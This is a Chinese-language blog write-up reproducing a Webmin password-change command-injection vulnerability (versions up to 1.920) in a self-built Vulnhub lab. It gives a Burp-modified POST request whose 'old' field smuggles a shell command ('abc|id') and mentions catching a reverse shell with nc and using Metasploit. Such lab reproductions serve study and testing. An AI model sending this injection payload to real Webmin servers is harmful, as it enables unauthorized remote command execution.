美文网首页
Vulnhub-Webmin 远程命令执行漏洞(CVE-2019

Vulnhub-Webmin 远程命令执行漏洞(CVE-2019

作者: M0nkeyK1ng | 来源:发表于2020-08-26 21:55 被阅读0次

    郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。

    漏洞简述

    Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

    影响版本:小于等于1.920

    准备环境

    测试机IP:192.168.79.129

    靶机IP:192.168.79.131

    1. 启动Vulnhub靶机环境:

    2. 验证靶机应用启用成功:

    3. 通过nmap扫描确认Webmin版本

    漏洞复现

    引用:https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

    POC:

    方法一:手工利用

    1. 访问 /password_change.cgi页面

    2. 通过Burp拦截

    3. 改包重放,验证成功

    #Request mode改为POST

    #增加Referer: https://192.168.79.131:10000/session_login.cgi

    #增加

    user=test&pam=&expired=2&old=abc|id&new1=cba&new2=cba

    注意:发送的user参数的值不是当前已知的Linux用户

    4. 使用NC侦听反弹端口

    5. 通过Burp执行反弹命令

    6. 得到反弹Shell

    方法二:使用MSF

    关闭环境

    相关文章

      网友评论

          本文标题:Vulnhub-Webmin 远程命令执行漏洞(CVE-2019

          本文链接:https://www.haomeiwen.com/subject/bfwfsktx.html